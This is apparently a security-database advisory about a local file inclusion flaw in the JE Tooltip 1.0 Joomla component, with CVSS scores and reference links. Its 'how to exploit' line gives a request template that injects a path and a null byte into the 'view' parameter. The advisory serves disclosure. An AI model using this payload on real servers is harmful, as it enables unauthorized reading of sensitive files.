joomla component & plugin JE Tooltip Local File Inclusion

2010.04.03
Credit: Chip D3 Bi0s
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


Ogólna skala CVSS: 4.3/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Brak
Wpływ na dostępność: Brak

--------------------------------------------------------------------------------- joomla component & plugin JE Tooltip Local File Inclusion --------------------------------------------------------------------------------- Author : Chip D3 Bi0s Group : LatinHackTeam Email & msn : chipdebios[alt+64]gmail.com Date : 11 March 2010 Critical Lvl : Moderate Impact : Exposure of sensitive information Where : From Remote --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : JE Tooltip (component and plugin) version : 1.0 Developer : Hardik Mistry License : GPL type : Commercial Date Added : 11 March 2010 Demo : http://joomlaextensions.co.in/formcreator/ Download : http://joomlaextensions.co.in/extensions/joomla-module.html?page=shop.product_details&category_id=4&flypage=flypage.tpl&product_id=51&vmcchk=1 Description : JE Tooltip new Joomla 1.5 native MVC component and plugin that allows you to enter a word that you want to put on tool tip word. User can put the unlimited tooltips. Below steps follow for installation:- Go to Joomla Installation and install the component and plugin. After that you can create tooltip on specific words on your entire website. --------------------------------------------------------------------------- Vulnerable file: jeformcr.php -------------------- how to exploit http://192.168.0.1/index.php?option=com_jeformcr&view={LFI}%00 +++++++++++++++++++++++++++++++++++++++ [!] Produced in South America +++++++++++++++++++++++++++++++++++++++

Referencje:

http://www.securityfocus.com/bid/38866
http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt
http://www.exploit-db.com/exploits/11814
http://secunia.com/advisories/39063
http://osvdb.org/63120


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top